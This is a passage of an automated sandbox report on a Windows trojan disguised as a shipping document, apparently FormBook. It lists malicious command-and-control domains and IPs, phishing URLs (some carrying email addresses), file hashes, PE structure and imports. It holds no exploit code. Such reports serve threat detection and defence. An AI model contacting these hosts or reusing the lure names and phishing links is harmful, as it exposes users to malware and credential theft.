https://lzy-tw.oss-accelerate.aliyuncs.com/upload/202310/11/202310111441491430.jpg	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/css/mescroll.min.css	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://lzy-tw.oss-accelerate.aliyuncs.com//templates/main/images/buy-logo.png	AtBroker.exe, 00000003.00000002.4110035048.000000000580E000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.4111694204.00000000073F0000.00000004.00000800.00020000.00000000.sdmp, DvhYoKnukykMD.exe, 00000005.00000002.4109302605.000000000402E000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
38.47.237.27	iuyi542.xyz	United States	174	COGENT-174US	true
185.27.134.144	www.hasthosting.xyz	United Kingdom	34119	WILDCARD-ASWildcardUKLimitedGB	true
38.88.82.56	www.college-help.info	United States	174	COGENT-174US	true
154.23.184.95	wcp95.top	United States	174	COGENT-174US	true
156.234.28.94	www.jllllbx.top	Seychelles	136800	XIAOZHIYUN1-AS-APICIDCNETWORKUS	false
67.223.117.142	www.flikka.site	United States	15189	VIMRO-AS15189US	true
104.21.14.183	www.yvrkp.top	United States	13335	CLOUDFLARENETUS	true
206.119.81.36	neg21.top	United States	174	COGENT-174US	true
194.58.112.174	www.marketplacer.top	Russian Federation	197695	AS-REGRU	true
3.33.130.190	loginov.enterprises	United States	8987	AMAZONEXPANSIONGB	true
47.129.103.185	www.kghjkx.xyz	Canada	34533	ESAMARA-ASRU	true
142.250.184.211	ghs.google.com	United States	15169	GOOGLEUS	false
113.20.119.31	dns.webcake.io	Viet Nam	45903	CMCTELECOM-AS-VNCMCTelecomInfrastructureCompanyVN	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1553447
Start date and time:	2024-11-11 08:30:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	shipping doc_20241111.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@7/2@17/13
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 95% Number of executed functions: 42 Number of non-executed functions: 307
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target DvhYoKnukykMD.exe, PID 5580 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:31:42	API Interceptor	13249449x Sleep call for process: AtBroker.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
38.47.237.27	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	www.iuyi542.xyz/cymd/
185.27.134.144	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	www.hasthosting.xyz/04fb/
185.27.134.144	http://outlook-accede-aqui.iceiy.com/	Get hash	malicious	Unknown	Browse	outlook-accede-aqui.iceiy.com/jquery.min.js
38.88.82.56	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	www.college-help.info/fu91/
	SecuriteInfo.com.FileRepMalware.20173.21714.exe	Get hash	malicious	FormBook	Browse	www.college-help.info/wm94/
	NF_Payment_Ref_FAN930276.exe	Get hash	malicious	FormBook	Browse	www.college-help.info/lk0h/
	18in SPA-198-2024.exe	Get hash	malicious	FormBook	Browse	www.college-help.info/lk0h/
	WARUNKI UMOWY-pdf.bat.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.college-help.info/ah9r/
	PO1268931024 - Bank Slip.exe	Get hash	malicious	PureLog Stealer	Browse	www.college-help.info/lk0h/
154.23.184.95	fHkdf4WB7zhMcqP.exe	Get hash	malicious	FormBook	Browse	www.wcp95.top/x8cs/
	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	www.wcp95.top/1bs4/
	icRicpJWczmiOf8.exe	Get hash	malicious	FormBook	Browse	www.wcp95.top/x8cs/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.wcp95.top/rj0s/
	DHL_IMPORT_8236820594.exe	Get hash	malicious	FormBook	Browse	www.wcp95.top/rj0s/
	COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.hm23s.top/jd21/?FPTX=E8EgvcVhhAQQFir9OK6E+Mqm7tqMiVehFrZTPh8pbZDzIj0aN6RyatkqXtPCo6PBps4o&BlO=O0DXpF3H2

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
dns.webcake.io	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	113.20.119.31
	https://pagina.pro/Iraq2024ew	Get hash	malicious	Unknown	Browse	203.205.10.134
	http://www.open-sora.org	Get hash	malicious	Exela Stealer, Growtopia, Python Stealer	Browse	203.205.10.134
	Versanddetails.exe	Get hash	malicious	FormBook	Browse	113.20.119.61
	Versanddetails.exe	Get hash	malicious	FormBook	Browse	113.20.119.61
	pagamento.exe	Get hash	malicious	FormBook	Browse	113.20.119.61
	Original Shipment Document.exe	Get hash	malicious	FormBook	Browse	113.20.119.61

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
WILDCARD-ASWildcardUKLimitedGB	SHIPPING DOC_20241107.exe	Get hash	malicious	FormBook	Browse	185.27.134.144
	https://downloadourauthfile-list.thsite.top/?em=EU-Sales-Support@scanlab.de	Get hash	malicious	Unknown	Browse	185.27.134.155
	http://appealaccountreporte.rf.gd/?i=1	Get hash	malicious	Unknown	Browse	185.27.134.215
	kingdom.ps1	Get hash	malicious	Atlantida Stealer	Browse	31.22.4.235
	VM2ICvV5qQ.pdf	Get hash	malicious	Unknown	Browse	185.27.134.114
	http://growthsparkplus.thsite.top/?email=anna@cellnextelecom.com	Get hash	malicious	Unknown	Browse	185.27.134.108
	la.bot.arm-20241006-1050.elf	Get hash	malicious	Unknown	Browse	82.163.179.172
	https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	31.22.4.60
	http://reactivar-email002003.hstn.me/	Get hash	malicious	Unknown	Browse	185.27.134.98
	http://instagram.totalh.net/	Get hash	malicious	Unknown	Browse	185.27.134.215
COGENT-174US	fHkdf4WB7zhMcqP.exe	Get hash	malicious	FormBook	Browse	154.23.184.141
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	39.0.189.25
	sora.arm.elf	Get hash	malicious	Mirai	Browse	206.119.119.205
	yakuza.mips.elf	Get hash	malicious	Unknown	Browse	149.16.115.193
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	38.176.131.48
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	38.3.100.64
	shindeVarm7.elf	Get hash	malicious	Mirai	Browse	38.54.248.202
	5r3fqt67ew531has4231.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	149.51.254.20
	yakuza.x86.elf	Get hash	malicious	Unknown	Browse	149.115.174.218
	5r3fqt67ew531has4231.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	149.6.31.194
COGENT-174US	fHkdf4WB7zhMcqP.exe	Get hash	malicious	FormBook	Browse	154.23.184.141
	sora.ppc.elf	Get hash	malicious	Mirai	Browse	39.0.189.25
	sora.arm.elf	Get hash	malicious	Mirai	Browse	206.119.119.205
	yakuza.mips.elf	Get hash	malicious	Unknown	Browse	149.16.115.193
	yakuza.arm4.elf	Get hash	malicious	Unknown	Browse	38.176.131.48
	botnet.m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	38.3.100.64
	shindeVarm7.elf	Get hash	malicious	Mirai	Browse	38.54.248.202
	5r3fqt67ew531has4231.sh4.elf	Get hash	malicious	Mirai, Okiru	Browse	149.51.254.20
	yakuza.x86.elf	Get hash	malicious	Unknown	Browse	149.115.174.218
	5r3fqt67ew531has4231.m68k.elf	Get hash	malicious	Mirai, Okiru	Browse	149.6.31.194

Process:	C:\Windows\SysWOW64\AtBroker.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spiketop

Download File

Process:	C:\Users\user\Desktop\shipping doc_20241111.exe
File Type:	data
Category:	dropped
Size (bytes):	288768
Entropy (8bit):	7.99575100253732
Encrypted:	true
SSDEEP:	6144:ePk1m4+aBcS2/c1a94oLZYQ8zzYCghqjuwgJ/YrMaB:Pm4+gcS2V9f8zG8ju3J/Yr1
MD5:	CE2547325B8A80894A670B9A4272255C
SHA1:	C39B622B229312FF7FE7A71F6C4EF9E9995C19CD
SHA-256:	B167DA015C510C91BB6BDC3E9BA1C537E55D2F56A3D1929C6009DB198F92979D
SHA-512:	87A27333C92A3C8A69FC0DDDD5855EF343B3F350B30AC3B1AE75486EEEF758191B6637E595F099566145DA7EAD41213E59F2CF53805B8822EA2E9639DB477945
Malicious:	false
Reputation:	low
Preview:	x....H0X5k..<...s.WO....QE...5JJLTH0X533F53KRZOKWLC792RMCQU.JJLZW.V5.:...J..n.?%0.I@=108.)+":'DxWV.4@]k;4o...cZVV7cN\_.JJLTH0XL2:..S,.g/,.q#P.(..k5R.P....8R.)...w2=..>/+.YU.MCQU5JJL..0Xy22F....ZOKWLC79.ROBZT>JJ.PH0X533F53.FZOKGLC7I6RMC.U5ZJLTJ0X333F53KR\OKWLC792"ICQW5JJLTH2Xu.3F%3KBZOKW\C7)2RMCQU%JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F.G..OKW..392BMCQ.1JJ\TH0X533F53KRZOkWL#792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X533F53KRZOKWLC792RMCQU5JJLTH0X53

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.410696298380571
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	shipping doc_20241111.exe
File size:	1'601'024 bytes
MD5:	a3881d5172648b6020efe54076616fee
SHA1:	2417a1b17e97fd2d9f02c46dd028ff10085ec696
SHA256:	219b2f19475b0ba36726568f9dd52320c1c44f24c9e3ac018c0742967e157ba2
SHA512:	43a584cfc9b423526b2ff02725747f41633278786102f2ef3939f4009f5be3bc52a019747b8a264fb46ccad3d5c54484acc9090a1fc2fe7a8b4b7a6400230541
SSDEEP:	24576:u5EmXFtKaL4/oFe5T9yyXYfP1ijXdaJlk9MV0wOZKGG+sHa5jksjiEi02gDGD:uPVt/LZeJbInQRaJ+DxXFjkNA2
TLSH:	9275D00273C2D062FFAB96334B56F6115ABC79260123EA1F13981D79BE701B1563E7A3
File Content Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x4204f7
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x67316817 [Mon Nov 11 02:12:39 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	0b768923437678ce375719e30b21693e

Entrypoint Preview

Instruction
call 00007FD65CEC0603h
jmp 00007FD65CEBFF0Fh
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD65CEC00EDh
mov dword ptr [esi], 0049FE10h
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE18h
mov dword ptr [ecx], 0049FE10h
ret
push ebp
mov ebp, esp
push esi
push dword ptr [ebp+08h]
mov esi, ecx
call 00007FD65CEC00BAh
mov dword ptr [esi], 0049FE2Ch
mov eax, esi
pop esi
pop ebp
retn 0004h
and dword ptr [ecx+04h], 00000000h
mov eax, ecx
and dword ptr [ecx+08h], 00000000h
mov dword ptr [ecx+04h], 0049FE34h
mov dword ptr [ecx], 0049FE2Ch
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDF0h
and dword ptr [eax], 00000000h
and dword ptr [eax+04h], 00000000h
push eax
mov eax, dword ptr [ebp+08h]
add eax, 04h
push eax
call 00007FD65CEC2CBDh
pop ecx
pop ecx
mov eax, esi
pop esi
pop ebp
retn 0004h
lea eax, dword ptr [ecx+04h]
mov dword ptr [ecx], 0049FDF0h
push eax
call 00007FD65CEC2D08h
pop ecx
ret
push ebp
mov ebp, esp
push esi
mov esi, ecx
lea eax, dword ptr [esi+04h]
mov dword ptr [esi], 0049FDF0h
push eax
call 00007FD65CEC2CF1h
test byte ptr [ebp+08h], 00000001h
pop ecx

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xc8e74	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xd4000	0xb023c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x185000	0x75cc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb1010	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc3420	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb1030	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x9c000	0x894	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9aa37	0x9ac00	17187df51446e12491449bc34d849147	False	0.5653003205775444	data	6.665680008888402	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x9c000	0x2fb92	0x2fc00	8ab1e4a7788882b436d7b30c3a4c9b0c	False	0.3529327552356021	data	5.692798211199345	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xcc000	0x705c	0x4800	c69381d9330fec33b92360836b24215a	False	0.043511284722222224	DOS executable (block device driver @\273\)	0.5845774219571381	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xd4000	0xb023c	0xb0400	79d073933bd0b7f01e29316a6386106d	False	0.9625318594858157	data	7.961639851059768	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x185000	0x75cc	0x7600	40b4850993e12fb1b505490e48047c95	False	0.7645325741525424	data	6.798203799100818	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xd45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xd46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xd47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xd4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xd4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xd4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xd5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xd6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xd69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xd8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xda038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xda4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xda4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xdaa84	0x68a	data	English	Great Britain	0.2735961768219833
RT_STRING	0xdb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xdb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xdbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xdc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xdc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xdc7b8	0xa7502	data			1.0003151839886533
RT_GROUP_ICON	0x183cbc	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x183d34	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x183d48	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x183d5c	0x14	data	English	Great Britain	1.25
RT_VERSION	0x183d70	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x183e4c	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll	HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll	DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentThread, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, EnterCriticalSection, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll	IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, TranslateMessage, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, GetKeyboardLayoutNameW, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, GetMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, ReleaseDC, GetDC, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, ClientToScreen, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, TrackPopupMenuEx, BlockInput, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, LockWindowUpdate, keybd_event, DispatchMessageW, ScreenToClient
